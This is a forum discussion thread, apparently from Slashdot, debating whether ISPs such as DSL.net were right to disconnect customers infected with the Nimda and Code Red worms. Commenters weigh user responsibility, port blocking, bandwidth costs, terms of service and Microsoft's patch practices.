Shutting Down Worm-Infected Broadband Users

disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.

Why?

[Ed Avis]

Why is it an ISPs job to have any concern over what's passing across the wires? They are just packets and that should be that. If users wish to run systems which are configured to respond in a particular way to particular requests on port 80, that's the users' business.

I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying. As the poster said, users should be responsible for their own systems.

Re:Why?

[clare-ents]

You attempted to hack their webserver. Anyone who attempts to hack them gets their connection cut off. Seems a relatively sensible policy in the terms and conditions to me.

Re:Why?

[Jace of Fuse!]

They are just packets and that should be that.

They care because the traffic generated by infected systems can be costly in both cash value and time. Not to mention the fact that there could be liability issues if they knew of infected systems but did nothing about it.

Besides, if there are 3 vulnerable systems on a network, and 1 infected system, the responsible thing to do is to protect the 3 remaining uninfected systems.

(This is a bit off topic, but I figured I'd mention it here for those who think that viruses and worms don't cost anyone any real money...

Wednesday the 19th, my place of employment had to shut down entirely between the hours of about 7pm till around 10pm. Where I work, that kind of shut down costs tens of thousands of dollars. Not to mention all of the hourly workers who were sent home at 7pm. Since their shift ended at 11, they were literally out 4 hours of pay even though they don't actually work with the systems that were effected. Lost production. Lost sales. Lost wages. One tiny, preventable worm.)

Re:Why?

[mjh]

They care because the traffic generated by infected systems can be costly in both cash value and time. Not to mention the fact that there could be liability issues if they knew of infected systems but did nothing about it.

Besides, if there are 3 vulnerable systems on a network, and 1 infected system, the responsible thing to do is to protect the 3 remaining uninfected systems.

I don't believe that is the reason why the provider shutdown their customers. I believe the reason is that they have very specific expectations of bandwidth usage. And they use these expectations to create a nice little equation: for X broadband users we need to have f(X) available bandwidth from our service provider, where f(X) is significantly lower than sum(all user's subscription rates). So while they guarantee you 7x24 access (at whatever rate you paid for) they're only expecting you to be a user 1-2 hours a day, maybe 3-4 days a week. The virii turn your computer bandwidth usage into 7x24 at your subscribed rate. And this really screws up their equation. This is one of the reasons that several broadband providers don't allow you to have servers on your network. The usage patterns of your web server or email server are too unpredictable, and consequently they have to set a policy that forbids them.

If they don't know about, or stop the virii, they end up with bad trending data. The trending data is what they used to determine whether or not f(X) was reasonable. When the trending data changes, so does f(X), and they have to spend more money believing that they need more bandwidth. Failure to do this results in customers switching to another provider. This is *especially* true of DSL customers for whom other providers are nearly guaranteed to exist (since DSL has open access). So, when a provider know that the trending data is bad, they have one of two choices:

1. Fix the problem causing the bad trending data - i.e. turn off users who are infected. Hopefully, they will use good identification techniques to determine which users are actually infected. I wouldn't be surprised to see some providers who simply turn off any user who has used more than the expected bandwidth assuming that it must mean that they are infected.
2. Try and explain to their management why the trending data is bad, and why it's conclusions should be ignored. This of course has the added disadvantage that even though the data is bad, customers are still experiencing denial of service.

I guess I find myself agreeing with Taco, but only to a limited extent. The providers have to make at least some consession to the users who need to be able to download patches. It's easy for us in the *nix world to raise our noses at this. But don't forget that the very first Internet denial of service worm exploited sendmail. We're not immune. We're just not popular. And when the day comes that we are popular, I would like to think that there is a way for me to get the code that will resolve a problem that I didn't know I had.

Re:Why?

[Simon Brooke]

Why is it an ISPs job to have any concern over what's passing across the wires?

I pay a lot of money for my leased line. So do my ISP's other customers. A substantial fraction of my expensive bandwidth is being eaten up because other people (mostly also customers of my ISP) can't be bothered to patch their systems. The service my ISP is able to provide me is consequently degraded, and I'm not happy about it.

If an ISP emerges who only accepts clueful customers, I'm likely to move my account. ISPs know this: if they don't switch off the clueless (and consequently troublesome) customers, they will lose the clueful (and consequently more profitable) ones.

I'm getting to the point where I think there would be some merit in having to pass a test, like a driving test, before you can connect your computer to the public information infrastructure.

Re:Why?

[Ed Avis]

A substantial fraction of my expensive bandwidth is being eaten up because other people (mostly also customers of my ISP) can't be bothered to patch their systems.

So the service provider should simply have bandwidth caps. Or bill users according to their usage. If someone wants to run an insecure system that eats up bandwidth, that's their concern.

I can imagine a two-tier system where you choose either (a) metered bandwidth and keep out of my hair or (b) pay a fixed price but the ISP is allowed to snoop on what you do and block off your access if you're using too much.

Re:Why?

[Simon Brooke]

So the service provider should simply have bandwidth caps. Or bill users according to their usage. If someone wants to run an insecure system that eats up bandwidth, that's their concern.

Not if it's my bandwidth and I'm paying for it, it's not. Yes, so I could sue them. But frankly if they're too stupid to use a computer, cutting them off the Net is for their own good.

Re:Why?

[Wansu]

I'm getting to the point where I think there would be some merit in having to pass a test, like a driving test, before you can connect your computer to the public information infrastructure.

Perhaps with different classes of licenses?

You're joking, right?

[RasputinAXP]

Being a responsible sysadmin for any type of network includes shutting down problem areas that are clogging your network with unwelcome traffic, much like Nimda did this week.

Our campus was affected rather badly by Nimda, and as a result the students were cut off from the network to make sure that they weren't infecting or being infected by the worm. The outage only lasted as long as it took McAfee to distribute the cleaning agent for it.

If you have cancer, you cut it out, right?

It's not unwelcome nannying, it's a necessary precaution. You do what you have to do to ensure that you maintain your level of service.

Re:Why?

[Herbmaster]

There's no question if ISPs have the responsibility to shut down worm`ed users. In my opinion, no, it's not their job.

The question is are ISPs entitled to shut down users just because they get infected? If they're being a good netizen by doing so (and they are), then yes, they should, because it benefits the community (their other customers, whom they have a responsibility to serve, mainly, but the entire internet essentially). Not because the worm uses up too much bandwidth; bandwidth is plentiful, but because proliferating the worm sucks eggs.

I'd also like to note that this is not just a matter of "users should be responsible for their own systems." In the past, I would have absolutely agreed with this: users have the responsibility to make sure computers under their control are patched and safe to the best of their ability, and if a patch is out, it's their fault if they don't have it. But in the past few weeks I've been [unfortunately] using IIS frequently. I saw the worm hit my workplace on Wednesday and it really hurt. I also saw why so many are vulnerable to it: Microsoft makes keeping a server up to date a hellish process. Specifically, I refer to the facts that install CDs are only available in old, deprecated versions; it's often difficult to tell what version you're running, let alone what patch level; the numbering scheme for updates/patches/"service packs" is illogical and version numbers are often duplicated; and most importantly, that for some retarded reason applying patches in the wrong order can un-do fixes you've already applied. Microsoft has got to share some of the blame this time; maybe not as much as the perpetrators, or maybe even the users, but they fucked up.

Accountability.

[Wakko Warner]

I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying.

I hope this is a troll, but I fear it is not.

If I leave the fence to my pool open, and my neighbor's kid walks in, falls into the pool, and drowns himself, I am liable not only for civil but also for criminal damages. If my dog gets loose and injures someone, I am also liable. Why, then, if my computer damages others' machines on the internet, should I not be liable for damages?

What I think needs to happen is this: Any owner of an infected netblock needs to be assessed a charge if their computers damage or disrupt traffic on the Internet. The fines should be commensurate with the amount of damage caused. If I'm a major ISP and I own a large netblock that's affected (even if I sell parts of that netblock off), it should be my responsibility to track down the sources of that disturbance within my network and eradicate it, otherwise I should be punished.
I no longer have any tolerance whatsoever for lazy or complacent admins; fines may finally force people to wake the fuck up and secure their goddamned machines and their networks. I mean, come on! Nimda exploits holes in Windows NT and 2000 that are over six months old, and it's done a pretty damned good job of showing me that there are plenty of clueless admins out there! These admins need to be dealt with, they're making life hard for the rest of us.

You call it nannying. I call it being responsible.

Well at least this is better then what AT&T di

[Sc00ter]

AT&T Broadband shut down port 80 for everybody, if they were infected or not.. They should have only shut down infected people.

Re:Well at least this is better then what AT&T

[YKnot]

That is, uhm, stupid. Why would you shut down port 80 for infected machines? To prevent them from being infected twice? Shutting down port 80 for vulnerable machines is more sensible, but how do you tell them from the well-patched servers? Blocking ports isn't meant to be a punishment, it's supposed to be a preventive measure.

Re:Well at least this is better then what AT&T

[ZanshinWedge]

Yes, most @homes specifically say you can't run servers in their AUPs, although DSL ISPs (and some @homes) typically let you run servers to your heart's content. However, one real advantage that blocking port 80 WOULD have is denying the ability to access the backdoors created by nimda / code red on those machines.

Re:Well at least this is better then what AT&T

[Sc00ter]

AT&T Broadband's modem leasing agreement clearly states that you can run a http or ftp server.

Re:Well at least this is better then what AT&T

[Syberghost]

Road Runner in Central Florida has done the same thing. Don't know if it includes the rest of the country.

At first I didn't know if they'd blocked just me, to stop the constant flood of email from my auto-notifier [dasbistro.com] :-)

Re:Well at least this is better then what AT&T

[Sc00ter]

That is untrue.. According to the AT&T Broadband leasing agreement it states that you can run a http or ftp server on your cable modem connection. But they will not support it.

"FTP/HTTP Service Setup. Customer should be aware that when using the Service to access the Internet or any other online network or service, there are certain applications, such as FTP (File Transfer Protocol) server or HTTP (Hyper Text Transfer Protocol) server, which may be used to allow other Service users and Internet users to gain access to Customer's computer. If Customer chooses to run such applications, Customer should take the appropriate security measures. Neither AT&T nor @Home Network shall have any liability whatsoever for any claims, losses, actions, damages, suits or proceedings resulting from, arising out of or otherwise relating to the use of such applications by Customer, including without limitation, damages resulting from others accessing Customer's computer."

Re:Well at least this is better then what AT&T

[bfields]

That is untrue.. According to the AT&T Broadband leasing agreement it states that you can run a http or ftp server on your cable modem connection. But they will not support it.

How does that jibe with the following, from http://help.broadband.att.com/legal/violations.jsp [att.com] ?

AT&T Broadband provides an Internet connection for personal use. Redistribution of the AT&T Broadband service is a violation of our policies. There are several ways that this could be accomplished.

FTP servers: Running an FTP server is a violation of the AT&T Broadband Terms of Service.

....

Interestingly, I can find no such clause forbidding redistribution in the leasing agreement [att.com] that you quote (only a clause prohibiting *selling* services). But clearly they believe that running any kind of server is a violation. From http://help.broadband.att.com/faq.jsp?content_id=4 16&category_id=34 [att.com]:

Can I Host a Server?

AT&T Broadband does not allow servers to be connected to the cable modem. This means that no computer in a personal network can be used as a server.

That seems pretty clear to me! Perhaps the leasing agreement isn't the only agreement you're subject to (I notice they also have links to an "acceptable use policy", but they seem not to be accessible by non-AT&T users). In any case, I wouldn't want to have to be in the position of having to argue the point with them after they'd blocked port 80. If you want to run servers, go elsewhere if you have the choice. If that choice isn't exercised, it may eventually diseappear....

--J. Bruce Fields

Wrong set of Agreements

[TBone]

Try changing your zip code to the same city as sone of us who is telling you that we're allowed to run servers - the help pages change based on where your service is coming from.

Try 32225 - Jacksonville, Florida. Formerly MediaOne Roadrunner. Then go look at the service agreements.

We're allowed to run servers, we just can't have AT&T support them.

MS never fix?

[onion2k]

Microsoft will never fix the problem without making sure people have to pay a monthly subscription

I could have sworn both the Code Red and Nimda (multiple) exploits were patched in October *last year*.

Yes its the fault of the users not keeping their machines up-to-date, but please, don't blame this on MS when they released, and advertised, a patch promptly. Heck, it'd be like some idiot running an old version of Sendmail blaming the sendmail author(s) on his box getting hacked. If you're on the net, its you responibility to stay safe.

Re:MS never fix?

[Syberghost]

He said "fix the problem", not "bandaid the current exploits".

The problem is that security is nothing resembling a priority to Microsoft. Security is something to be added after the fact, by people who know little about designing a secure OS, in response to complaints. And at that, only if the complaints come from big customers.

case in point [grc.com].

Re:MS never fix?

[malkavian]

From words I hear, the lack of security isn't due to lack of programming skill, or any other such thing.
It all comes down to MS knowing that anything they put in will eventually be hacked by some enterprising person.
Now, if they claim they've built a secure OS, and it gets hacked, they may open themselves to litigation from many people, which is financially not a good thing.
Therefore, they don't claim to have a highly secure OS.
And as they don't claim to have a highly secure OS, then there's not much value in spending lots of R&D money it it to put it in the product if you can't tout it and leverage it for more sales.
So, they put very basic 'security' in there (read, just about none), and never claim to have it anyway. So, no legal comeback, as they haven't made the claim, and lots of wide open holes that screw users over, as it's not financial sense for MS (not the rest of the world tho) to include reasonable security measures.
I don't think MS really care too much how much money it costs businesses as a whole, who get virus infections, and need constant patching, as long as that burden of cost doesn't fall on them.
Good financial sense, crap ethics.

Malk

Re:Regarding your case in point

[Syberghost]

This is the same as win9x, macos, win2000 with users who run as administrator, and linux with users who run as root!

Those users choose to run as root. With XP, ActiveX controls on a web page will be able to run as root, without any knowledge of the user. Contents of emails will be able to run as root.

Thirdly, adding raw sockets is a very common add-on to windows and linux just to do these kinds of DoS attacks.

Yes, but you have to get enough access to add it on. With XP, you won't, anymore. It'll be a whole hell of a lot easier to do. As for Linux, the fact that you think it's an add-on speaks volumes as to whether you know what you're talking about.

It's up to the operating system to be able to *handle* badly formed data, not other OSes to protect it from it!

Name one operating system that can "handle" a massive distributed denial of service attack. I'm sure the entire industry is awaiting your answer with baited breath. What OS is on the other end means nothing when 10 pounds of shit is being rammed into a five-pound sack.

Steve's objection isn't to raw socket support. Raw socket support is available in every mature OS in existence that has TCP/IP support.

Steve's objection is to taking something that previously required priviledged access, and thus required a major break in security to get on machines you don't own, and making it suddenly available to unprivileged processes BY DEFAULT, making every Windows XP machine suddenly a hell of a lot easier to use as a DDoS platform, without breaking the security first.

Steve's second objection, and the one I was using as a case in point, is the fact that Microsoft doesn't just not understand the problem, they made it abundantly clear that they don't CARE whether or not it's a problem, because Marketing wants the feature, and Security is at best a tertiary consideration.

Re:MS never fix?

[Genom]

What they *should* have done was stop pressing new Win2k CDs, and patch the master copy. Then press their new CDs with the patched version.

This includes OEM install CDs.

There's no excuse for a retail copy (either in a store, or through a vendor's "bundling" with a new system) of an OS with year-old security flaws to be vulnerable out-of-the-box to those flaws, especially when the company producing it not only knows about the flaws, but has patches available.

MS is *in part* responsible for not keeping retail/OEM copies reasonably up-to-date. By reasonably, I mean something less than a year behind the times.

That's not to say that lazy/ignorant admins aren't to blame for not patching their servers. That's their job, and their responsibility. But, newly installed/purchased copies should have been immune already. IMHO, at least.

Re:MS never fix?

[Telek]

MS is *in part* responsible for not keeping retail/OEM copies reasonably up-to-date.

Except of course for the fact that they print most of them in advance and have large stores of the CDs, they're not just going to throw them all out when all it takes is 5 minutes once your server is online to patch any problems that have crept up.

However I suppose that they could provide a patch disk with it, or a supplimental CD that does contain all necessary upgrades.

Oh WAIT, that's right, that's what Windows Update is for!

However you can only use Windows Update if you have a legally purchased copy of Windows... And I'll bet you that many many many of those people who are running vulnerable servers don't have a legal copy. Or just clicked "cancel" when Windows prompted them to update their system the first time it was connected to the internet.

MS has done their job, maybe not the best way that they could have done it, but they provided all the tools needed, and even almost-automated the task of updating your system, all you have to do is follow the wizard. However most people just click "cancel" and never give it a second thought.

And for all of you out there who are toting how MS is so insecure and buggy, lets keep in mind that you're comparing apples to oranges here. IIS has much much more functionality than Apache does, and it has been around much longer, unfortunately in this case longer means a more convoluted codebase =(. However I can't defend them by that really, because bugs like simple buffer overflow attacks should have been caught in testing, or shouldn't have ever happened in the first place. You'd think by now people would have learned their lessons about static sized buffers (or at least not checking the length of the input prior to storage)... Oh well.

Re:MS never fix?

[Thomas Charron]

I'd like to point out that a good half of the vulnerabilities that Nimda exploits are patches that are not available under Windows update, but only on www.microsoft.com/security, 'spec when deadling with Win2k Server and Advanced server. Windows Update is really only up to date for Win2k Pro, and consumer OSs such as Me, etc..

Re:MS never fix?

[PapaZit]

IIS has much much more functionality than Apache does, and it has been around much longer, unfortunately in this case longer means a more convoluted codebase,

Please name one bit of functionality that IIS had that apache does not. The only thing I can think of is .asp, and that's because Microsoft wanted a proprietary way to do the things that Apache users were already doing with perl and php.

The second bit is just insane. IIS was microsoft's late entry into the webserver wars, long after Apache was created. Apache, in turn, was "a patch-y" version of the old NCSA web server. I was going to get dates, but the NCSA httpd web pages [uiuc.edu] haven't been updated since '96. There's some history here [apache.org], though. The IIS code base is convoluted mostly because they were rushing to catch up so that people didn't give money to Netscape for their Windows-based web servers.

Re:MS never fix?

[jcostom]

I could have sworn both the Code Red and Nimda (multiple) exploits were patched in October *last year*.

If MS was so interested in making the fix widely available, why hasn't it been included in a service pack? There *HAVE* been service packs issued since this patch was released.

Cool!

[ch-chuck]

So when are the authorities going to not only FIRE people for purching Msft products, but ARREST & PROSECUTE them for not patching and keeping them worm free and in general from pissing in the public pool? That's what I'd like to see since Msft wants to both 1) publish buggy and patch later 2) market their shiny baubles to the vast computer ignorant laity.

Similarly, there's a certain division of responsibility when someone buys a car - if there are defective parts that might threaten the safety of other drivers (such as tire blowouts), it's the mfg's responsibility to send out recall notices and fix it; but it's also the owners responsbility to operate the vehicle in a safe manner. What happens in the software licensing world is the mfg assumes *NO* responsibility, even for defects that might endanger data or other people's PC's via a network (info 'superhighway').

It gets really bizzare when you consider that software and all rights remains the property
of the authors & publishers, but responsibility for it's misdeeds & FU's are the poor suckers who fell for the slick ads, don't read or understand EULA's, pirate the stuff, etc. That's like GM leasing cars with defective brakes, and holding the operator responsible for all damages that occur when they fail after pulling onto an off ramp and crashing into a child care facility.

Re:MS never fix?

[Velox_SwiftFox]

having had to wade through 100+ web pages to examine the effects and side-effects and warnings and caveats associated with Microsoft's post-service-pack 2 patches while collecting them to install a "up-to-date" MS Win2000/IIS system, I can only assume this is a troll. Sendmail releases a new version that can be installed, not a three-year-old version you have to patch the bejeezus out of.

Re:MS never fix?

[Captain_Chaos]

Don't worry, in a patent petition, I'll write Microsoft. But here, I'll keep saying Micro$oft, since it is my opinion that Micro$oft is far more profit oriented than most companies.

The way Micro$oft behaves is not normal capitalism. Normal capitalism is trying to make money by providing a useful and quality service or product to consumers, preferably in competition with others. Micro$oft's form of capitalism is to try and make as much money as possible and avoid competing with others by any means possible, legal or no, with no regard for any consumer interests other than those that will make them buy M$ products (such as the superficial qualities of speed and good looks). The result (among other things) is software that is full of security holes, since those are not listed on the box...

I'm not saying that no other company acts this way, I'm saying that most don't and that Micro$oft is probably the worst of all that do.

Blocking ports...

[Jace of Fuse!]

Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users.

Confuse users? Bah! They get confused well enough on their own!

My major issue with blocking ports is that, well, no ISP should! An ISP provides internet connectivity, and that's what they should do.

Yes, I agree they should have some say so over what traffic comes and goes over their network (i.e. no spam, DoS attacks, etc), but I myself would not give any ISP my business if I knew they were making choices about which ports I can or can not use.

I think they are doing the right thing by booting infected users. It's certainly better than any form of port blocking.

The Problem is

[Foxman98]

"I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. "

I think the huge underlying problem is that a) people do *not* know their box is infected and b) if they do know, they have no idea what to do about it. Don't forget, most people are very timid and lack any basic knowledge regarding computers. All they know how to do, is double click on the word2k icon, or outlook, or whatnot.

Re:The Problem is

[DrSkwid]

but they are running IIS

Which isn't a free web server, they should have paid plenty of $ to run it, they should be held responsible when it all goes wrong.

reminds me of a story back when i owned an ISP.

User bought 1 million email addresses or some amount and promptly spammed them all. When the flood of stuff came back (rejected addresses, flames etc.) we had to cope with it. We sent them an invoice for our incurred costs (as mentioned in our ToS) and they whined "but i didn't know".

Well, tough.

"I didn't know asbestos was poisonous" doesn't wash in court why should "but I didn't know" work for internet based damage?

(ok the net is hardly life and death [usually] but you get my meaning)

Incorrect Assumption

[samael]

but they are running IIS Which isn't a free web server, they should have paid plenty of $ to run it

Actually, IIS is entirely free. Or at least it comes built into Windows 2000 and 98, and is downloadable for free for NT and 95.

Give them limited access

[DrXym]

Surely if a user is infected, the ISP could cut them off from the world but still allow them access to an internal ftp site with had patches to fix the problem?

Re:Give them limited access

[Syberghost]

I would think this approach would work:

1) Cut them off entirely, forcing them to call in. (I used this approach with hacked boxes myself, when I ran an ISP. It's very effective.)

2) When they call in, let them back on, but block port 80 BOTH directions, and email them the patches.

3) When they say they've installed the patches, scan them to see if they're still vulnerable. If not, re-open port 80.

There are some logistical problems with this (step 2 requires router changes, and networks that aren't designed to accomodate a change like this might not have the CPU cycles available on their routers for these kind of rules), but they are solveable.

You'd have proof that you sent them the patches, and proof that they received them (they're gone from the mail spool), so you could prove in court if necessary that they didn't work with you to fix their problem. It seems sound, but if there are any other holes please let me know.

Re:Give them limited access

[Spoing]

You'd have proof that you sent them the patches, and proof that they received them (they're gone from the mail spool), so you could prove in court if necessary that they didn't work with you to fix their problem. It seems sound, but if there are any other holes please let me know

I'd say you went beyond the call of duity;

It's not your machine that's infected; you do not have direct responsibility for what is on it or how it is configured / mis-configured. You did have a responsibility for general network stability and speed, and they're abusing it...even if unintentionally.

Re:Give them limited access

[dasunt]

I'd say you went beyond the call of duity;

Take 30 minutes out of your day to automate most of this process, and to write a simple script to do changes. Have it scan for bandwidth-wasting viruses (or all viruses - some ISPs have this on their mail servers and will block viruses at the smtp server). When it finds nimda or its kin, block that user to all sites except an ftp/http site with the patches, the info, and a short, simple explanation why their service has been cut (also throw in the number of a good computer store that will do in-house calls if you want). Really, I don't think you'd have to disable the pop3 server, and that way, you can send them an email explaining the reasons again. So either you get a call asking why the customer has no access, or else the customer reads the email, adds the patches, and goes back to the http site and runs the script that scans him again and reactivates the full account.

Okay, its above the call of duty. But it doesn't take that much time, and it would be the ISP I would recommend to friends.

Sure beats closing ports for all

[gad_zuki!]

I was just asking someone why ISPs don't do this. Why should the subnet I'm get get punished because of users who don't know what they're doing. Obviously they're going to call tech support and then get a quick lesson on how to download and install an MS patch.

I'd rather have the infected parties make some effort instead of the AT&T approach of just closing port 80 and letting the ignorant go unenlightened.

New slogan? Patches are the new killer app!

The stick and carrot

[CunningPike]

I'm in favour of ISPs locking out infected machines that have demonstrated no attempt at fixing the problem. After all, these people have shown a blatant distregard of basic sysadmin responsibilies: how long has CodeRed been known about now?

However, here's a suggestion for a better response than simply removing Internet access to/from infected machines. The ISP runs some kind of DMZ server, but on the DSL side. All web traffic from infect machines is redirected to that one server (via transparent proxying), all other traffic is blocked. That way the end user can instantly see what's wrong. The ISP can also mirror the relevant patches on the DMZ so the end-user can get back up again as fast as possible.

It would take some setting up initially, but would reap substantial rewards in the long run.

Re:The stick and carrot

[Tom]

nice idea, but quite impractical in real life - your routers won't survive this load.

I work at an ISP, I know what I'm talking about. when code red ran rampant, we knew of a way to filter it out at the border routers, but the additional load would've killed them, so we didn't.

Re:The stick and carrot

[cascadefx]

I work at a place that has done something similar. All traffic but port 80 is blocked and the user of an infected machine can only get to a web page (no matter what address he is trying to go to) that says they have been blocked because they are infected and then lists instructions for removal and mirrors the appropriate tools. When done, the fix is verified and they can continue.

Re:The stick and carrot

[Telek]

how long has CodeRed been known about now?

Never mind that how long has the patches been available and posted prominantly on the MS web site listed under "critical updates"?

Answer, much longer. IIRC several months prior to CodeRed coming out.

It doesn't take a lot of work to pop on by to MS every now and then and download any critical/recommended patches. However it's pretty clear that most of these people aren't even aware that they were running a website, much less infected. However you must have had your head under a rock for a while to not have heard about it in the news. Bah, someone just write a proggy that shuts down these servers (one that works) and then go through the DShield database and shut'em all down. You could fake the IP address so it wouldn't be traceable anyways, or at the very least make it a program that you could give to ISPs so that they could run it against their networks to shut down anyone with these servers still running. But I guess that it's just as easy to have them terminate their client's connection. Bah.

The problem, here, I would think, is that these boxen are probably sitting somewhere on the net not being maintained. I mean any sysadmin, or even any user who circuits the web should have heard about it by now. If they haven't, then they're most likely not really using the web on that connection, in which case cutting them off won't really get their attention (not directly at least) anyways.

I wonder if there is any statistics on, in the past month, the boxes that have been recognized by their owners and patched. I find it hard to believe that you could account for the (still) 150+ CR hits a day that I get by just "ignorant" people or crappy sysadmins.

[/ramble]

Re:The stick and carrot

[don_carnage]

My ISP blocked all internal traffic to port 80 -- which means that NO ONE (not even us law-abiding Apache users) is able to run a webserver. The only circumvention is to move your server to a different port (8080.)

The only problem is that now they are unable to tell which IIs servers are infected, which means that as soon as they turn 80 back on, it's all going to start again. *sigh*

Re:The stick and carrot

[ReelOddeeo]

This just gives Microsoft no reason to fix the deeper problems.

I'm not bashing MS here. (At least, not trying to.)

They make a system that is for people who don't want to have a deep understanding of how things work. [Just as I don't care how my car works, I just want it to go.] It strikes me therefore that it is MS responsibility to fix the problem. [Just as a car cannot be a public safety problem. It won't fly to say that owners must get under their hoods and adjust the frobulator bypass.] And I don't mean a hot patch or service pack fix. I mean a deeper fix. Do it right the first time.

Your suggested approach is very nice in the short run. The ISP helps the entire Internet. Provides a very nice way for the customer to discover they're infected and fix it. But it puts a higher burden on the ISP, and takes away MS's incentive to get it right in the first place. Not a good long term trend.

Much better IMHO for operators of infected systems to serve a 5 zillion year jail term and a public flogging, thus putting pressure on MS to prevent problems like this to begin with.

[For the humor impaired moderators, I think you get my actual point here. A slight penalization of users puts pressure on MS. It's a sad state of affairs that I must add this disclaimer.]

It's a feature, not rudeness

[YKnot]

Those affected should welcome this kind of action. After all, the internet provider is closing a backdoor for the customer. That backdoor (FULL system access!) would otherwise keep announcing itself to the world.

the purge effort (longish?)

[zerodvyd]

this worm is particularly nasty. it's really made my work week, that much is for sure.

in response to the growing storm regarding users vs ISPs... (/me dons his asbestos shorts)

yes users are responsible for their systems, they are responsible for watching patch levels, they are responsible for watching out for vulnerabilities. So many people throw up an IIS server or what-have-you on their DSL/Cable line it's not funny. Do you think all of them are subscribed to microsoft's Security advisory list? ...to NTBugTraq? Do they even service pack their server or workstation? The answer is: no not everyone. The information required to be a good MS product admin is there, you just need to get it. If you're a legit microsoft product owner it ought to be required that you get a digest format of their advisories in e-mail weekly. (An even better question is: how many of these IIS servers are properly licensed ???)

And for those of you that thought I was beating on the users hard up there...Yes it is the responsibility (nay, the duty) of the ISPs to protect their networks, and by mission of action the internet. I run apache as my webserver of choice, my logs flooded with attempts to find CMD.EXE and ROOT.EXE in all the right MS places tuesday night and into wednesday morning. A veritable denial of service attack. Here's the kicker: I'm on a dynamic IP! (nice about the randomization of searching in this worm...) Many requests were coming from my own ISPs network. Do you think they responded when I e-mailed them? no, they didn't.

A good ISP shuts off a user who (knowingly or unknowingly) abuses their connection. What if this worm were more malicious? What if it caused data loss? Think of the liability that could impose, so'n'so's unpatched web server infected my unpatched webserver and blew away my e-commerce site. Who takes the blame? so'n'so? or so'n'so's ISP? ...Both, in my estimation. While I agree that it is the responsibility of the user to keep themselves patched, ISPs monitor network traffic, they can easily pay attention when a known high risk virus or worm is flooding their network.

Don't even get me started on why worm/virus writers should be sending their exploits to anti-virus companies or other proper organizations instead of releasing them into the wild.

Re:the purge effort (longish?)

[GigsVT]

I agree... For example the phone company has a clause that is quite public that they WILL remove you from their network if you connect something to their phone line that messes it up or degrades it for other users.

This isn't unprecedented, it been common practice for over 20 years.

According to my ipchains log....

[shanek]

I've had almost 25,000 incoming port 80 requests since this virus was unleashed. (That's with my Linux box running constantly.) It's nice to see an ISP doing something productive.

To the naysayers, I'd like to point out that they aren't punishing people; just making them call to get their access back and make sure they're not infected. Remember, the bandwidth belongs to the ISP. They have to protect it.

I wish BellSouth would do something similar, but they've always been clueless. Heck, many of these requests were from BellSouth servers!

Re:According to my ipchains log....

[YKnot]

the bandwidth belongs to the ISP. They have to protect it.

Actually, no. The bandwith belongs to those who pay for it and that is the customer. Internet providers really have no business keeping packets of the net to save bandwith. They do however have the right to stop crackers and spammers if that is in their terms of service and I bet it is. If the service provider is nice, they can also try to protect their customers from crackers but as long as the actions are not covered by ToS, they should be prepared to stop nannying.

Re:According to my ipchains log....

[YKnot]

You're right, the ISP undersubscribes on bandwith. And yes, prices would be higher if they didn't do that. But no, dropping someone's packets to reduce the bandwith bill for the provider is not acceptable unless it's legitimized by the terms of service. Estimating the average bandwith requirements and deciding how much reserve you put on top of that is part of the ISP's job. If that estimate is proven wrong by a sudden increase in bandwith requirements due to worm proliferation or a new bandwith eating killer application, then that is the ISP's problem, not the customer's. Blocking ports of uninfected machines is an unacceptable measure. On the other hand, cutting off crackers in action (read: infected machines) is most likely covered by the ToS.

Prediction

[Mr_Silver]

As I've said before I confidently predict that if this trouble keeps up (and it will), DSL providers will just start enforcing a blanket ban of all ports less than 1024.

Yes it sucks, yes it's unfair and yes you'll probably have to pay fixe times your normal price to have it enabled but it'll deter those people who have no need to run a web server (ie. those who don't realise they're even running a web server) and will make the DSL providers life a little easier.

You'll see.

Arbitrary Decisions

[SubtleNuance]

I pay for DSL, i can run *WHATEVER* i want on it. Saying "tough beans" is a little short sighted.

If, on the other hand, they would like to have me charged me (as in contact the RCMP [rcmp-grc.gc.ca] or %your_local_federal_police%) for cracking i would 'understand'... the rule of law is always the highest order, to simply make endless arrays of rules in contracts - and force people to abide by them (least they go without(be martyrs)) then why have Law? Why have Legislature? Corporate COntracts for all manner of 'things' are creaping into every crack of life. These "contracts" force people to give up their rights in order to exist in a corporate controlled world... think IM nuts? go read some of the EULA discussed on /. this week... NO CONTRACT SHOULD EVER LIMIT FUNDEMENTAL HUMAN RIGHTS.

This isnt exactly a 'cut and dry' issue, these contracts basically allow, arbitrary 'for the greater good' decisions to be made by the DSL providers... I know that their TOS probably say "no bandwidth hogging servers" but, when ALL DSL is provided under the same TOS it becomes a method for DSL providers to make decisions about what I may - and may not - run on my box. I pay for bandwidth, allowing them to decided what data i may send and rec oversteps the bounds on my 'RIPE FOR ABUSE' meter.

Think of the Censorship analogy - if they can censor some speech, then they are only an 'arbitrary decision' away from censoring *YOUR* speech. Whats to stop them from saying "you cannot download streaming OGG because there is no publisher-protection-scheme built it, and you may be violating copyright...

again, i may sound a bit unreasonable, or maybe paranoid, OBVIOUSLY I am not saying we want to allow these worms to run, but we must be weary of 'seemingly' reasonable decisions when made by 'powerful' (plutocratic) people.

Re:Arbitrary Decisions

[malkavian]

Yes, I believe we are all wary of 'seemingly reasonable' decisions.
However, I think pulling the plug on infected machines is a good thing.
The only way to show people there's a problem is to make them wake up and smell the coffee.
